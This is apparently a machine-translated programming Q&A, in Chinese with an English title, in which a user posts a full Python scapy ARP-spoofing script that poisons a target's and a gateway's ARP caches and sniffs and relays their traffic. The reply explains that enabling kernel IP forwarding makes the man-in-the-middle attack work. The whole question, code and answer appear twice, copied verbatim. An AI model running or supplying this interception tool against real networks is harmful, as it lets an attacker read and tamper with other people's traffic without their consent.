使用 python scapy 的 ARP 欺骗不起作用
ARP Spoofing using python scapy not working
我使用 scapy python 代码成功完成了 ARP 欺骗。目标电脑中用于网关的 mac 地址已更改为我电脑的 mac 地址,路由器缓存中目标电脑的 mac 地址已更改为我的 mac 地址。现在我想通过我的电脑将这些数据包转发到相应的位置。这样我就可以看到目标电脑和 gateway.But 之间的流量它不起作用。
import os
import sys
import threading
import signal
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
our_mac='d8:5d:e2:0c:58:87'
print 'Enter Target IP:'
target_ip = raw_input()
print 'Enter Gateway IP'
gateway_ip = raw_input()
packet_count = 50
# turn off output
conf.verb = 0
def get_mac(ip_address):
responses,unanswered =srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
# return the MAC address from a response
for s,r in responses:
return r[Ether].src
return None
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip,target_mac)
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
# slightly different method using send
print"[*] Restoring target..."
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=100)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=100)
# signals the main thread to exit
print"[*] Target Restored..."
sys.exit(0)
os.kill(os.getpid(), signal.SIGINT)
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst= target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst= gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)
print "[*] ARP poison attack finished."
sys.exit(0)
return
def send_packet_to_gateway(pkt):
try:
if(pkt.haslayer(IP) and pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=gateway_mac
sendp(pkt)
elif(pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=gateway_mac
sendp(pkt)
except:
print "It's interrupt"
sys.exit(0)
def send_packet_to_target(pkt):
try:
if(pkt.haslayer(IP) and pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=target_mac
sendp(pkt)
elif(pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=target_mac
sendp(pkt)
except:
print "It's interrupt"
sys.exit(0)
def capture_packets():
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "dst host %s and ether dst %s" % (target_ip, our_mac)
sniff(filter=bpf_filter,prn=send_packet_to_target)
except KeyboardInterrupt:
# restore the network
#restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
print "It's interrupt"
sys.exit(0)
return
# start poison thread
poison_thread = threading.Thread(target = poison_target, args =(gateway_ip, gateway_mac,target_ip,target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
capture_thread = threading.Thread(target = capture_packets)
capture_thread.start()
bpf_filter = "src host %s and ether dst %s" % (target_ip,our_mac)
sniff(filter=bpf_filter,prn=send_packet_to_gateway)
except KeyboardInterrupt:
sys.exit(0)
# restore the network
#restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
#sys.exit(0)
你不需要用Scapy转发数据包。您可以启用 ip 转发,您的系统将自动转发数据包。在 linux 中,您可以 运行 以下命令:
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
使用这个命令你只需要运行来自Scapy的毒药,而不是重定向。
我使用 scapy python 代码成功完成了 ARP 欺骗。目标电脑中用于网关的 mac 地址已更改为我电脑的 mac 地址,路由器缓存中目标电脑的 mac 地址已更改为我的 mac 地址。现在我想通过我的电脑将这些数据包转发到相应的位置。这样我就可以看到目标电脑和 gateway.But 之间的流量它不起作用。
import os
import sys
import threading
import signal
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
our_mac='d8:5d:e2:0c:58:87'
print 'Enter Target IP:'
target_ip = raw_input()
print 'Enter Gateway IP'
gateway_ip = raw_input()
packet_count = 50
# turn off output
conf.verb = 0
def get_mac(ip_address):
responses,unanswered =srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
# return the MAC address from a response
for s,r in responses:
return r[Ether].src
return None
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip,target_mac)
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
# slightly different method using send
print"[*] Restoring target..."
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=100)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=100)
# signals the main thread to exit
print"[*] Target Restored..."
sys.exit(0)
os.kill(os.getpid(), signal.SIGINT)
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst= target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst= gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)
print "[*] ARP poison attack finished."
sys.exit(0)
return
def send_packet_to_gateway(pkt):
try:
if(pkt.haslayer(IP) and pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=gateway_mac
sendp(pkt)
elif(pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=gateway_mac
sendp(pkt)
except:
print "It's interrupt"
sys.exit(0)
def send_packet_to_target(pkt):
try:
if(pkt.haslayer(IP) and pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=target_mac
sendp(pkt)
elif(pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=target_mac
sendp(pkt)
except:
print "It's interrupt"
sys.exit(0)
def capture_packets():
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "dst host %s and ether dst %s" % (target_ip, our_mac)
sniff(filter=bpf_filter,prn=send_packet_to_target)
except KeyboardInterrupt:
# restore the network
#restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
print "It's interrupt"
sys.exit(0)
return
# start poison thread
poison_thread = threading.Thread(target = poison_target, args =(gateway_ip, gateway_mac,target_ip,target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
capture_thread = threading.Thread(target = capture_packets)
capture_thread.start()
bpf_filter = "src host %s and ether dst %s" % (target_ip,our_mac)
sniff(filter=bpf_filter,prn=send_packet_to_gateway)
except KeyboardInterrupt:
sys.exit(0)
# restore the network
#restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
#sys.exit(0)
你不需要用Scapy转发数据包。您可以启用 ip 转发,您的系统将自动转发数据包。在 linux 中,您可以 运行 以下命令:
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
使用这个命令你只需要运行来自Scapy的毒药,而不是重定向。